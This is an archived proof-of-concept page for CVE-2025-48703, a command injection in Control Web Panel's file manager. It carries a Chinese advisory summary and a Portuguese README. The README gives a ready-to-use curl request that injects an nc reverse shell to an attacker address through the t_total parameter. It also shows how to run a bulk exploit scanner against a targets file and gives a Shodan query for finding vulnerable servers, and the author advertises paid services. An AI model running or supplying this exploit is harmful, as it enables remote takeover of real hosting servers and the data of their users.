Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-48703 PoC — Control Web Panel 操作系统命令注入漏洞

Source
Associated Vulnerability
Title:Control Web Panel 操作系统命令注入漏洞 (CVE-2025-48703)
Description:Control Web Panel是一款Linux虚拟主机控制面板。 Control Web Panel 0.9.8.1205之前版本存在操作系统命令注入漏洞,该漏洞源于filemanager changePerm请求中t_total参数包含shell元字符,可能导致远程代码执行。
Description
CVE-2025-48703 é uma vulnerabilidade de Execução Remota de Código (RCE) no módulo filemanager de um painel de hospedagem web (por exemplo, cPanel). Ocorre devido ao tratamento de entrada não sanitizado na função acc=changePerm, que permite que um atacante injete e execute comandos.
Readme
# 🛡️ CVE-2025-48703 - Execução Remota de Código (RCE) no File Manager do cPanel

## 📌 Descrição

**CVE-2025-48703** é uma vulnerabilidade de Execução Remota de Código (RCE) no módulo `filemanager` de um painel de hospedagem web (por exemplo, cPanel). Ocorre devido ao **tratamento de entrada não sanitizado** na função `acc=changePerm`, que permite que um atacante injete e execute comandos arbitrários do sistema usando o parâmetro `t_total`.

---

## 🧨 Impacto

Essa vulnerabilidade permite que atacantes:

- Executem comandos arbitrários no servidor alvo.
- Estabeleçam um reverse shell para acesso persistente.
- Potencialmente escalem privilégios ou movam-se lateralmente.

> ⚠️ Este ataque pode ser realizado com autenticação mínima ou, em algumas configurações, com acesso não autenticado.

---

## 🚀 Prova de Conceito (PoC)

### ✅ Comando de Reverse Shell

```bash
curl -kis 'https://<IP_ALVO>:2083/myuser/index.php?module=filemanager&acc=changePerm'   --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <IP_ATACANTE> 4444 -e /bin/bash`'
```

## Uso do scanner
```bash
python3 Exploit.py  # Certifique-se de que targets.txt esteja no mesmo diretório
```

## Busca no Shodan
```text
Server: cwpsrv
```

Referência: https://fenrisk.com/rce-centos-webpanel

---

## 💌 Contato

**Caso queira me contatar ou precise de algum serviço, me encontre nas seguintes plataformas:**

**Usuário do Discord: 4wj.**

**Instagram: @glowwz9**

**E-mail: vliyanie1337@proton.me**
File Snapshot

[4.0K] /data/pocs/02710a9331134a6e491d5c70ff6fc1f6e71bdc9b ├── [4.0K] CVE-2025-48703 │   ├── [1.2K] Exploit.py │   └── [ 0] target.txt └── [1.5K] README.md 2 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.